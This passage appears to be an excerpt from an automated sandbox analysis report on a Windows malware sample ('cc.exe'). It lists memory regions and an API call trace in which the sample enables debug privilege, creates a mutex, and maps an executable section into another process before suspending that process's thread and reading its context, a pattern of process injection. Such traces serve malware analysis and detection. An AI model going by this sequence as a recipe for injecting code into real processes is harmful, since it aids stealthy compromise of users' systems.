"private_0x000000007f0e0000" filename = "" Region: id = 500 start_va = 0x90000 end_va = 0xf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 501 start_va = 0x1b0000 end_va = 0x2ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 502 start_va = 0x860000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 504 start_va = 0x9f0000 end_va = 0xcf2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 505 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 506 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 507 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 508 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 509 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 510 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 511 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 512 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 513 start_va = 0x100000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 514 start_va = 0x100000 end_va = 0x128fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 515 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 516 start_va = 0x210000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 517 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 518 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 519 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 520 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 521 start_va = 0xd00000 end_va = 0xe97fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 950 start_va = 0x130000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 951 start_va = 0x1b0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 952 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 953 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 954 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 955 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 956 start_va = 0x1d0000 end_va = 0x1edfff monitored = 0 entry_point = 0x1e158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 957 start_va = 0x860000 end_va = 0x9e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 958 start_va = 0x1d0000 end_va = 0x1edfff monitored = 0 entry_point = 0x1e158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 959 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 960 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 961 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 962 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 963 start_va = 0xea0000 end_va = 0x1020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 964 start_va = 0x1420000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 982 start_va = 0x1e0000 end_va = 0x208fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 984 start_va = 0x20000 end_va = 0x2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Thread: id = 7 os_tid = 0xf98 [0073.503] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x45ee14 | out: HeapArray=0x45ee14*=0x760000) returned 0x1 [0073.514] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x45edc4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0073.517] NtCreateFile (in: FileHandle=0x45ede4, DesiredAccess=0x120089, ObjectAttributes=0x45edac*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x45edcc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x45ede4*=0x20, IoStatusBlock=0x45edcc*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0073.529] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x763130) returned 1 [0073.533] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0x45edcc, FileInformation=0x45ed24, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x45edcc, FileInformation=0x45ed24) returned 0x0 [0073.539] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x13bb40) returned 0x1b0020 [0073.571] NtReadFile (in: FileHandle=0x20, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x45edcc, Buffer=0x1b0020, BufferLength=0x13b740, ByteOffset=0x45ed3c*=0, Key=0x0 | out: IoStatusBlock=0x45edcc, Buffer=0x1b0020*) returned 0x0 [0073.602] NtClose (Handle=0x20) returned 0x0 [0073.603] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x180001) returned 0x860020 [0073.876] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x45ed64, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0073.876] NtCreateFile (in: FileHandle=0x45ed84, DesiredAccess=0x120089, ObjectAttributes=0x45ed4c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x45ed6c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x45ed84*=0x20, IoStatusBlock=0x45ed6c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0073.877] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x763130) returned 1 [0073.877] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0x45ed6c, FileInformation=0x45eae0, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x45ed6c, FileInformation=0x45eae0) returned 0x0 [0073.877] NtClose (Handle=0x20) returned 0x0 [0073.877] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x208) returned 0x763130 [0073.877] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x763130) returned 1 [0073.880] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x75131320, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x45eda0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x45eda0*(BaseAddress=0x75131000, AllocationBase=0x75130000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0074.296] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x45edf8, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x45edf8, ResultLength=0x0) returned 0x0 [0074.300] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x45ee1c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x45ee1c, ReturnLength=0x0) returned 0x0 [0074.307] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x860020) returned 1 [0074.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x45eaac*=0x0, ZeroBits=0x0, RegionSize=0x45eab0*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x45eaac*=0x20000, RegionSize=0x45eab0*=0x10000) returned 0x0 [0074.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0xc0000004 [0074.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x45ee0c*=0x20000, RegionSize=0x45ead0, FreeType=0x8000) returned 0x0 [0074.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x45ea98*=0x0, ZeroBits=0x0, RegionSize=0x45ea9c*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x45ea98*=0x20000, RegionSize=0x45ea9c*=0x20000) returned 0x0 [0074.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0074.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x45ee0c*=0x20000, RegionSize=0x45ee10, FreeType=0x8000) returned 0x0 [0074.361] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x45ebc8 | out: Value="kEecfMwgj") returned 0x0 [0074.361] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x45ec38 | out: BaseAddress=0x45ec38*=0x77180000) returned 0x0 [0074.378] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x45ee24 | out: TokenHandle=0x45ee24*=0x40) returned 0x0 [0074.388] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x45ee18 | out: lpLuid=0x45ee18*(LowPart=0x14, HighPart=0)) returned 1 [0074.401] NtAdjustPrivilegesToken (in: TokenHandle=0x40, DisableAllPrivileges=0, NewState=0x45ee14, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x0 [0074.402] NtClose (Handle=0x40) returned 0x0 [0074.403] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x45e758 | out: Value="kEecfMwgj") returned 0x0 [0074.406] NtOpenDirectoryObject (in: FileHandle=0x45ec18, DesiredAccess=0x2000f, ObjectAttributes=0x45ebe4*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x45ec18*=0x40) returned 0x0 [0074.408] NtCreateMutant (in: MutantHandle=0x45ee44, DesiredAccess=0x1f0001, ObjectAttributes=0x45ebcc*(Length=0x18, RootDirectory=0x40, ObjectName="62AQ09U8C34JCCAZ", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x45ee44*=0x88) returned 0x0 [0074.408] NtClose (Handle=0x40) returned 0x0 [0074.408] NtClose (Handle=0x88) returned 0x0 [0074.409] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x45e1dc | out: Value="kEecfMwgj") returned 0x0 [0074.420] RtlSetEnvironmentVariable (in: Environment=0x0, Name="62AQ09U8", Value="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe" | out: Environment=0x0) returned 0x0 [0074.422] NtCreateSection (in: SectionHandle=0x45e8f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x45e690, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x45e8f0*=0x88) returned 0x0 [0074.425] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0xffffffff, BaseAddress=0x45e8f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x45e690*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x45e8f4*=0x100000, SectionOffset=0x0, ViewSize=0x45e690*=0x29000) returned 0x0 [0074.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x45dff8*=0x0, ZeroBits=0x0, RegionSize=0x45dffc*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x45dff8*=0x20000, RegionSize=0x45dffc*=0x10000) returned 0x0 [0074.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0xc0000004 [0074.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x45e684*=0x20000, RegionSize=0x45e01c, FreeType=0x8000) returned 0x0 [0074.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x45dfe4*=0x0, ZeroBits=0x0, RegionSize=0x45dfe8*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x45dfe4*=0x20000, RegionSize=0x45dfe8*=0x20000) returned 0x0 [0074.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0074.449] NtOpenProcess (in: ProcessHandle=0x45e64c, DesiredAccess=0x438, ObjectAttributes=0x45e66c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x45e640*(UniqueProcess=0x45c, UniqueThread=0x0) | out: ProcessHandle=0x45e64c*=0x40) returned 0x0 [0074.449] NtQueryInformationProcess (in: ProcessHandle=0x40, ProcessInformationClass=0x1a, ProcessInformation=0x45e358, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x45e358, ReturnLength=0x0) returned 0x0 [0074.449] NtCreateSection (in: SectionHandle=0x45dff4, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x45dfb4, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x45dff4*=0x8c) returned 0x0 [0074.449] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x45dffc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x45dfb4*=0x197c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x45dffc*=0xd00000, SectionOffset=0x0, ViewSize=0x45dfb4*=0x198000) returned 0x0 [0074.476] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x40, BaseAddress=0x45dff8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x45dff0*=0x197c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x45dff8*=0x77a0000, SectionOffset=0x0, ViewSize=0x45dff0*=0x198000) returned 0x0 [0076.777] NtClose (Handle=0x8c) returned 0x0 [0076.783] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x2000) returned 0x774100 [0076.784] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x45dcc0 | out: TokenHandle=0x45dcc0*=0x8c) returned 0x0 [0076.788] NtQueryInformationToken (in: TokenHandle=0x8c, TokenInformationClass=0x1, TokenInformation=0x45d4b8, TokenInformationLength=0x400, ReturnLength=0x45dcb8 | out: TokenInformation=0x45d4b8, ReturnLength=0x45dcb8) returned 0x0 [0076.789] ConvertSidToStringSidW (in: Sid=0x45d4c0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x45dcbc | out: StringSid=0x45dcbc*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0076.789] NtClose (Handle=0x8c) returned 0x0 [0076.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x45df30*=0x0, ZeroBits=0x0, RegionSize=0x45df34*=0x10646, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x45df30*=0x130000, RegionSize=0x45df34*=0x11000) returned 0x0 [0076.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x45df1c*=0x0, ZeroBits=0x0, RegionSize=0x45df20*=0x10646, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x45df1c*=0x1b0000, RegionSize=0x45df20*=0x11000) returned 0x0 [0076.796] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x45df30*=0x7d5a6, NumberOfBytesToProtect=0x45df34, NewAccessProtection=0x40, OldAccessProtection=0x45df7c | out: BaseAddress=0x45df30*=0x7d000, NumberOfBytesToProtect=0x45df34, OldAccessProtection=0x45df7c*=0x20) returned 0x0 [0076.796] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x774100) returned 1 [0076.803] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x45dd28, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.805] NtCreateFile (in: FileHandle=0x45dd48, DesiredAccess=0x120089, ObjectAttributes=0x45dd10*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x45dd30, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x45dd48*=0x8c, IoStatusBlock=0x45dd30*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0076.805] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x7607f0) returned 1 [0076.808] NtQueryInformationFile (in: FileHandle=0x8c, IoStatusBlock=0x45dd30, FileInformation=0x45daa4, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x45dd30, FileInformation=0x45daa4) returned 0x0 [0076.808] NtClose (Handle=0x8c) returned 0x0 [0076.808] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x208) returned 0x7607f0 [0076.809] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x7607f0) returned 1 [0076.816] NtOpenProcess (in: ProcessHandle=0x45df38, DesiredAccess=0x438, ObjectAttributes=0x45d4e8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x45d528*(UniqueProcess=0x45c, UniqueThread=0x0) | out: ProcessHandle=0x45df38*=0x8c) returned 0x0 [0076.819] NtQueryInformationProcess (in: ProcessHandle=0x8c, ProcessInformationClass=0x0, ProcessInformation=0x45d538, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x45d538, ReturnLength=0x0) returned 0x0 [0076.825] NtOpenThread (in: ThreadHandle=0x45d4e0, DesiredAccess=0x1a, ObjectAttributes=0x45d4e8, ClientId=0x45d518*(UniqueProcess=0x0, UniqueThread=0x460) | out: ThreadHandle=0x45d4e0*=0x90) returned 0x0 [0076.829] NtSuspendThread (in: ThreadHandle=0x90, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0076.835] NtGetContextThread (in: ThreadHandle=0x90, Context=0x45da30 | out: Context=0x45da30*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xb0, [73]=0x0, [74]=0xd5, [75]=0x3, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100fc, SegGs=0x0, SegFs=0x24c0cc0, SegEs=0x0, SegDs=0x12f5e8, Edi=0x0, Esi=0x100ee, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x113, SegCs=0x0, EFlags=0x5, Esp=0x0, SegSs=0x100fc, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x5, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x3a, [45]=0x93, [46]=0x5f, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, 